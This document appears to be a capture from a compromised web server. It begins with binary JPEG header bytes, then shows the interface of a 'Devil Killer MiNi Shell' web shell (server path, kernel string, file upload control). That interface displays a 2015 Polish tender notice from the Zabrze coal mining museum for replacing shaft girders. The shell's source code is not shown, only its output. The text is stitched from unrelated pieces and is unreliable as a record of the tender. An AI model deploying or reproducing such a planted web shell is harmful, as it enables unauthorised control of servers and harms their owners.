JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150903/228370-N-2015.html

<p class="kh_header"><b>Zabrze: Remont zbrojenia szybowego szybu Kolejowy.</b><br>
<b>Numer ogłoszenia: 228370 - 2015; data zamieszczenia: 03.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Górnictwa Węglowego w Zabrzu , ul. Jodłowa 59, 41-800 Zabrze, woj. śląskie, tel. 32 630 30 91, faks 32 277 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumgornictwa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont zbrojenia szybowego szybu Kolejowy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont zbrojenia szybowego szybu Kolejowy. Prace będą polegać na dostawie i wymianie  dziesięciu  dźwigarów głównych  zbrojenia szybowego po stronie  przedziału drabinowego w szybie Kolejowy w Zabytkowej Kopalni Węgla Kamiennego Guido. Gwarancja udzielona na przedmiotowe zadanie obejmuje okres 3 lat od dokonania odbioru końcowego  Prace związane z wymianą dźwigarów muszą zostać przeprowadzone w taki sposób aby nie zakłóciły  funkcji obiektu. Zamawiający wymaga aby wymiana została przeprowadzona w terminie 70 dni od dnia podpisania umowy, jednak nie dłużej niż do 18. 12. 2015r. Kopalnia w ciągu dnia jest otwarta dla zwiedzających w związku z powyższym realizacja  przedmiotu zamówienia winna się odbywać w dniach roboczych w godzinach od 1400 do 600 dnia następnego (poniedziałek), , od 22o°do 600  dnia następnego(wtorek, środa, czwartek, piątek).
 Przedmiot zamówienia musi być wykonany zgodnie z wiedzą i doświadczeniem Wykonawcy przy zachowaniu wszystkich przepisów regulujących przedmiotowe prace w tym Rozporządzenia Ministra Gospodarki w sprawie bezpieczeństwa i higieny pracy, prowadzenia ruchu oraz specjalistycznego zabezpieczenia przeciwpożarowego w podziemnych zakładach górniczych (Dz. U. z 2.09.2002 r. Nr 139, poz.1169 ze zm.).Zamawiający ze względu na szczególne warunki panujące na terenie obiektu zaleca dokonanie wizji lokalnej obiektu przez Wykonawcę.

Przy wykonywaniu prac Wykonawca jest zobowiązany przestrzegać wszystkich przepisów prawnych regulujących materię dotyczącą przedmiotowych prac a zwłaszcza zgodnie z zaleceniami  ujętymi w rozporządzeniu Ministra Gospodarki z dnia 28 czerwca 2002 roku w sprawie bezpieczeństwa i higieny pracy,  prowadzenia ruchu oraz  specjalistycznego zabezpieczenia przeciwpożarowego 
w podziemnych zakładach górniczych (Dz. U. Nr 139, poz. 1169).                                   
1. Wszystkie roboty szybowe winny być uprzednio uzgodnione z kierownictwem kopalni.
2. Pracownicy wykonujący pracę winni zostać wyposażeni w odpowiednie środki bezpieczeństwa.
3. Wykonawca jest zobowiązany do przeszkolenia osób wykonujących zamówienie na terenie kopalni. Szkolenie zostanie przeprowadzone przez Zamawiającego i obejmie m. in:
- zapoznanie osób z obiektem kopalni,
- zapoznanie ze środkami bezpieczeństwa występującymi na danym terenie,
- zapoznanie z zagrożeniami istniejącymi na danym obiekcie w tym z zagrożeniem przeciwpożarowym, 
- zapoznanie ze sprzętem przeciwpożarowym w tym sposobem jego użycia. 
Z wyżej wymienionego szkolenia Zamawiający sporządzi protokół szkolenia, który podpisują wszystkie osoby uczestniczące  w realizacji zamówienia.
4. Przedmiotowe zamówienie  obejmuje wymianę 10 dźwigarów głównych po stronie przedziału drabinowego co wiąże się z dostawą poniżej przedstawionych  materiałów i wykonaniem elementów niżej wyszczególnionych.
Dźwigary główne wykonane są z profili stalowych [ 240 dł. 4140 mm - 10 sztuk
Dźwigary wsporcze wykonane są z profili stalowych [ 200 dł. 1200 mm - 10 sztuk  
Należy wymienić:
1) 2 dźwigary główne na których wsparte są pomosty spoczynkowe przedziału drabinowego mocowane na dwóch  dźwigarach  wsporczych  [ 200  dł. 1200 mm,
2) 8 dźwigarów głównych międzypomostowych posiadających po jednym dźwigarze wsporczym.
Dźwigary wpuszczane (osadzone) w obudowę murowaną cegłą.      
     
Realizacja zadania polega w szczególności na: 
1. opracowaniu technologii wykonawstwa robót, realizacji dostawy i wymiany wskazanych elementów zbrojenia szybowego. Dla ww.technologii Wykonawca zobowiązany jest uzyskać zatwierdzenie Zamawiającego przed rozpoczęciem robót,  
2. wykonaniu wszelkich prac przygotowawczych niezbędnych do prawidłowego rozpoczęcia i przeprowadzenia,
3. zorganizowaniu, prowadzeniu, nadzorowaniu i zabezpieczeniu robót określonych w powyższych punktach, zgodnie  z obowiązującymi przepisami prawa w tym przepisami miejscowymi.

Zamawiający  zapewni Wykonawcy:
1. obsługę elektryczną oraz teletechniczną,
2. łączność telefoniczną oraz sygnalizację alarmową dla poszczególnych punktów pracy,
3. przeszkolenie pracowników Wykonawcy w zakresie obowiązujących w ZKWK Guido przepisów bezpieczeństwa  i higieny pracy, prowadzenia ruchu i bezpieczeństwa pożarowego, występujących zagrożeń, porządku dyscypliny pracy, zasad łączności i alarmowania, znajomości rejonu prac, procedury zgłaszania wypadków i zagrożeń, możliwość  korzystania z łaźni i lampowni

Obowiązki Wykonawcy.
Wykonawca zobowiązany jest wykonać przedmiot umowy spełniając wszystkie wymogi Zamawiającego  opisane w SIWZ.
1. Wykonawca jest zobowiązany do dostarczenia imiennego wykazu osób pracowników Wykonawcy z określeniem funkcji, kwalifikacji oraz uprawnień (zgodnie z warunkami SIWZ ). Osoby te potwierdzą podpisami znajomość ruchu zakładu.
2. Wykonawca sprawuje dozór i nadzór nad przebiegiem prac zgodnie z obowiązującymi przepisami.
3. Wykonawca w trakcie wykonywania prac objętych umową, zobowiązuje się do stosowania obowiązujących przepisów prawa, w szczególności przepisów Prawa Geologicznego i Górniczego, Rozporządzenia MG z dnia 28 czerwca 2002r., do przestrzegania zarządzeń PIP i Władz Górniczych oraz regulaminów i wewnętrznych ustaleń Zamawiającego i z tego tytułu ponosi pełną odpowiedzialność za ewentualne skutki powstałe w wyniku zaniedbania lub rażącego naruszenia powyższych przepisów.
4. Wykonawca zobowiązuje się we własnym zakresie przeszkolić swoich pracowników wykonujących prace u Zamawiającego w zakresie znajomości przepisów regulujących bezpieczne wykonywanie robót w zakładach górniczych i nie zatrudniać pracowników, którzy nie wykazują dostatecznej znajomości tych przepisów.
5. Wykonawca zobowiązuje się zatrudniać przy kierowaniu, nadzorowaniu i wykonywaniu prac objętych   umową wyłącznie pracowników o pełnych kwalifikacjach i uprawnieniach do kierowania i wykonywania tych robót w ruchu zakładu górniczego zgodnie z warunkami opisanymi w SIWZ.
6. Zabezpieczenia we własnym zakresie niezbędnego sprzętu.
7. Zgłoszenie dozorowi ruchu kopalni rozpoczęcie i zakończenie robót, a tym samym przyjście i wyjście pracowników.
8. W przypadku uszkodzenia sprzętu, maszyn i urządzeń będących własnością Zamawiającego, z przyczyn zależnych od Wykonawcy, koszt z tytułu ich naprawy oraz skutków wystąpienia awarii ponosi Wykonawca.
9. Ubezpieczenia swoich pracowników; za szkody niezawinione przez Zamawiającego powstałe w wyniku wypadku, odpowiada Wykonawca w stosunku do swoich pracowników. Strony wyłączają w tym zakresie odpowiedzialność kopalni wynikającą z art. 146  Prawa Geologicznego i Górniczego. 

Zmawiający przewiduje możliwość dokonania wizji lokalnej na wniosek Wykonawcy. Wszelkie koszty związane z przeprowadzeniem wizji ponosi samodzielnie każdy Wykonawca. Każdy Wykonawca ponosi również wyłączną odpowiedzialność za wszelkie straty i szkody powstałe jako następstwo wizji lokalnej obiektu. Zamawiający nie ponosi odpowiedzialności za nieprawidłowości w przygotowaniu oferty oraz wyliczeniu ceny ofertowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 Pzp, w zakresie zgodnym i objętym przedmiotem zamówienia do 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.41.00-3, 28.00.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku udziału w powyższym  zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia) - (nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie usługi w zakresie niezbędnym do spełniania warunku wiedzy i doświadczenia tj.: 
a) co najmniej 1 (jedna) usługa szybowa o wartości nie mniejszej niż 100 000,00 zł brutto polegająca na remoncie zbrojenia szybowego - obejmująca zakresem wszystkie z nw. prac, tj. wymianę dźwigarów, wymianę prowadników drewnianych, wymianą pomostów spoczynkowych. Zamawiający dopuszcza sumowanie maksymalnie 3 umów (zamówień), które łącznie spełnią postawiony przez Zamawiającego warunek udziału w postępowaniu w zakresie wiedzy i doświadczenia. Jeżeli Wykonawca jest w trakcie wykonywania usługi okresowej lub ciągłej podane kwoty winny dotyczyć wyłącznie usługi zrealizowanej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku udziału w powyższym  zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadały następujące kwalifikacje zawodowe:
1) Kierownik działu energomechanicznego  (min. 1 osoba): kwalifikacje zawodowe: kwalifikacje do pełnienia funkcji  kierownika działu energomechanicznego w podziemnych zakładach górniczych wydobywających węgiel.
2) Nadsztygar urządzeń mechanicznych i szybowych - nadzór (min. 1 osoba): kwalifikacje zawodowe: kwalifikacje  osoby wyższego dozoru ruchu w specjalności mechanicznej w zakładach górniczych podziemnych. 
3) Sztygar zmianowy - nadzór (min. 1 osoba): kwalifikacje zawodowe: kwalifikacje osoby średniego dozoru ruchu w specjalności mechanicznej w zakładach górniczych podziemnych.
4) Rewident urządzeń wyciągowych (min. 1 osoba): kwalifikacje zawodowe: kwalifikacje uprawniające do zatrudnienia na  stanowisku rewidenta urządzeń wyciągowych w ruchu podziemnych zakładów górniczych.
5) Sygnalista szybowy (min. 3 osoby): kwalifikacje zawodowe: kwalifikacje uprawniające do pełnienia funkcji sygnalisty szybowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż 100.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1.1. zmiany terminu wykonania zamówienia oraz terminów pośrednich, o których mowa we wzorze umowy, w następujących przypadkach:
a) wystąpienie wydarzenia nieprzewidywalnego, pozostającego poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu;
b) konieczności wykonania zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 Pzp, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu;
c) niezawinionych przez Wykonawcę opóźnień w uzyskaniu wymaganych pozwoleń, uzgodnień, decyzji lub opinii innych organów, niezbędnych do uzyskania koniecznych pozwoleń, dopuszczeni, odbiorów;
d) wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności;
e) braku możliwości prowadzenia prac w związku ze wzmożonym ruchem turystycznym;
1.2 w pozostałym zakresie zmiany w umowie mogą dotyczyć następujących okoliczności:
a) zmiany personelu Wykonawcy lub Zamawiającego na skutek zdarzeń losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska; zmiana personelu Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej równoważnych;
b) zmiany podwykonawców pod warunkiem, że nowy podwykonawca wykaże  spełnianie warunków  wskazanych w opisie przedmiotu zamówienia w zakresie nie mniejszym niż wymagane w SIWZ;
c) wprowadzenie podwykonawcy pomimo deklaracji wykonawcy w ofercie o wykonaniu danego zakresu przedmiotu zamówienia wyłącznie siłami własnymi;
d) wprowadzenie dodatkowego personelu Wykonawcy z przyczyn o obiektywnym charakterze zaakceptowanych przez Zamawiającego pod warunkiem spełnienia  warunków w zakresie nie mniejszym niż wymagane w SIWZ;
e) ustawowej zmiany stawki podatku VAT, której zastosowania nie będzie skutkowało zmianą wartości brutto umowy;
f) ograniczenia przedmiotu zamówienia, w szczególności  w przypadku kiedy Zamawiający nie mógł takiej sytuacji przewidzieć;
g) zmian organizacyjnych: nazwy, adresu, numeru RIK, numeru NIP i REGON oraz osób reprezentujących Zamawiającego;
h) sposobu fakturowania i realizowania płatności za wykonane usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumgornictwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Górnictwa Węglowego w Zabrzu
ul. Jodłowa 59, 
41- 800 Zabrze
Sekretariat pok. Nr 1.02..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2015 godzina 10:00, miejsce: Muzeum Górnictwa Węglowego w Zabrzu
ul. Jodłowa 59, 
41- 800 Zabrze
Sekretariat pok. Nr 1.02..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi 
zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (Załącznik nr 5). 
II. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia, albo reprezentowania w postępowaniu - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia,  i zawarcia umowy w sprawie zamówienia publicznego.
III. Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: (spełnia) lub (nie spełnia), w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające,  że łącznie spełniają warunki  udziału w postępowaniu.
IV.  Zawartość oferty
1) Formularz oferty wraz  z oświadczeniem o spełnieniu warunków udziału w postępowaniu (część A wg Spisu zawartości oferty) złożony w formie oryginału,
2) Oświadczenie o braku podstaw do wykluczenia (część B wg Spisu zawartości oferty) złożone w formie oryginału,
3) Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione w pkt  5.2. i  5.3 SIWZ (jeżeli dotyczy), złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 
4) Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia (Załącznik nr 5 wg Spisu zawartości oferty) złożony w formie oryginału, wypełniony  odpowiednio lub z adnotacją -nie dotyczy-,
